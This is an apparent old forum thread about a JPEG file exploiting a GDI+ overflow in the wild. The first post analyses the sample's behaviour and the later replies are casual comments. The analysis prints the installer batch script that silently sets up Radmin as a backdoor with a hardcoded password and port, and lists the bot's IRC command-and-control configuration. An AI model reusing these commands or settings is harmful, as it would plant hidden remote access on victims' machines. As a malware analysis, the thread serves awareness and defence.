First Jpeg exploit found in the wild.

[Prophet]

Once this JPEG overflowed GDI+, it phoned home, connected to and ftp site and downloaded
almost 2megs of stuff. It installs a trojan that installs itself as a service.

It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you
can work on a remote computer exactly as if you were right there at its keyboard."

It phones home to the same IP that is in the usenet post headers. Then it seems
to connect to Link removed u/p bawz/pagdba (last time I checked, 93 users where logged in!)

it downloads these files:

-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll
-rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe
-rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt
-rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll
-rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll
-rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe
-rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log
-rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat
-rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx
-rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg
-rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat
-rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log
-rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll
-rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll
-rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll
-rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll
-rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg
-rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe
-rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe
-rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe
-rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe

and executes 'execute.bat', which looks like:

regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server

it also installs an irc client with this config info:
server1=irc.p2pchat.net
port1=7777
login=Darkbro0d
channel=#FurQ
password=letmein
nick1=Track100Mbit
nick2=Trck100#1
sfv=1
user=Trackmaster
login=darkbro0d

Here is the data:

The isolated file is here (BE CAREFUL - DON'T SUE ME FOR DAMAGE, I'LL COUNTER-SUE!):

link removed


md5: b7e7a5703a722558b6a170be5c43b90d
crc32:a3e0f71e
size: 4098 bytes

Make sure you are patched

***DO NOT CLICK ANY LINKS IN THE TEXT UNLESS YOU KNOW WHAT YOU ARE DOING***

 

[Hsu]

Both links removed. If they are dangerous, they have not right being here.

 

[SaiyanPrideXIX]

And that probably wasn't REALLY a jpeg file...

 

[Tassadar]

I'm pretty sure thats old news. There were jpg exploits runnign around IRC months ago.

 

[GhostfaceKillah]

i heart firefox

 

[Iyce Da Kidd]

i never knew that a "picture file" can exploit viruses/trojans

i thought it had to be a program file or a extractable file.

 

[Kurt`]

i heart firefox

I heart anything but IE.

Those "jpg" viruses aren't really that hard to make, since IE guesses what type of content you are throwing at it...